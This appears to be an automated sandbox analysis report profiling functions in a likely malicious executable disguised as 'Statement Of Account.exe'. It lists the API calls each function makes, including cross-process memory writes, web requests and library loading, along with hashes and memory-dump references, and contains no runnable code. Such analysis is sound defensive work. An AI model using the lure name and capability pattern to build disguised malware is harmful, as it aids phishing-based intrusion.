Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Variant$ClearCopyInit_malloc
String ID: 4RH
API String ID: 2981388473-749298218
Opcode ID: d956ccd27091b275d92ae689e644ef0078f9b2b1c30e9ed5fdb952697d9d3722
Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
Opcode Fuzzy Hash: d956ccd27091b275d92ae689e644ef0078f9b2b1c30e9ed5fdb952697d9d3722
Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96

Function 004667A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

__wcsnicmp.LIBCMT ref: 0046681A
WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9

Strings

LPT, xrefs: 00466814
HH, xrefs: 0046696D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Connection__wcsnicmp_wcscpy_wcslen
String ID: LPT$HH
API String ID: 3035604524-2728063697
Opcode ID: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
Opcode Fuzzy Hash: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A

Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8

Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF

Strings

@, xrefs: 00438BC3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$MemoryProcess$ReadWrite
String ID: @
API String ID: 4055202900-2766056989
Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66

Function 00465D41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00465D59
_wcslen.LIBCMT ref: 00465D8E
InternetCrackUrlW.WININET(?,00000000,?,?), ref: 00465D98

Strings

|, xrefs: 00465D6E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CrackInternet_memset_wcslen
String ID: |
API String ID: 915713708-2343686810
Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6

Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
HttpQueryInfoW.WININET ref: 0044A892

Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880

Strings

, xrefs: 0044A88A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
String ID:
API String ID: 3705125965-3916222277
Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A

Function 00437CA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00437CB2
GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D

Strings

AU3_GetPluginDetails, xrefs: 00437D20

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: AU3_GetPluginDetails
API String ID: 145871493-4132174516
Opcode ID: e60d032cda8e07fae4321829b238a90b33a1110472f30aca6681d3aeba7a8f27
Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
Opcode Fuzzy Hash: e60d032cda8e07fae4321829b238a90b33a1110472f30aca6681d3aeba7a8f27
Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96

Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D

Strings

Listbox, xrefs: 004511F6

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729

Function 004412AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352

Strings

SysAnimate32, xrefs: 00441311

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$LibraryLoad
String ID: SysAnimate32
API String ID: 3205928328-1011021900
Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729

Function 004609BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1

GetFocus.USER32 ref: 004609EF

Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04

GetClassNameW.USER32(?,?,00000100), ref: 00460A37
__swprintf.LIBCMT ref: 00460A7A

Strings

%s%d, xrefs: 00460A74

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Thread$Parent$AttachClassCurrentFocusInputMessageNameProcessSendTimeoutWindow__swprintf_wcslen
String ID: %s%d
API String ID: 2272629743-1110647743
Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A

Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D243
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C

Strings

HH, xrefs: 0045D2E3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: HH
API String ID: 2507767853-2761332787
Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A

Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D44A
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502

Strings

HH, xrefs: 0045D43C

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: HH
API String ID: 2507767853-2761332787
Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A

Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98

Strings

msctls_trackbar32, xrefs: 00450D4A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68

Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003

gethostbyname.WS2_32(?), ref: 0046BD78
WSAGetLastError.WS2_32(00000000,?,?,00000000,?,?), ref: 0046BD83
inet_ntoa.WS2_32(00000000), ref: 0046BDCD

Strings

HH, xrefs: 0046BD99

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
String ID: HH
API String ID: 1515696956-2761332787
Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A

Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

GetMenuItemInfoW.USER32 ref: 004497EA
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
DrawMenuBar.USER32 ref: 00449828

Strings

0, xrefs: 004497C2

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Menu$InfoItem$Draw_malloc
String ID: 0
API String ID: 772068139-4108050209
Opcode ID: c8976dca06d6b4a67e3115e3fbda4fe950bcb9b91ddbb3afb2d21d0cb6793a10
Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
Opcode Fuzzy Hash: c8976dca06d6b4a67e3115e3fbda4fe950bcb9b91ddbb3afb2d21d0cb6793a10
Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76

Function 0040F3B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042CD00

Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Statement Of Account.exe,?,C:\Users\user\Desktop\Statement Of Account.exe,004A8E80,C:\Users\user\Desktop\Statement Of Account.exe,0040F3D2), ref: 0040FFCA

Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC

Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037

Strings

@OH, xrefs: 0042CD31
$OH, xrefs: 0042CD15
X, xrefs: 0042CD0D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
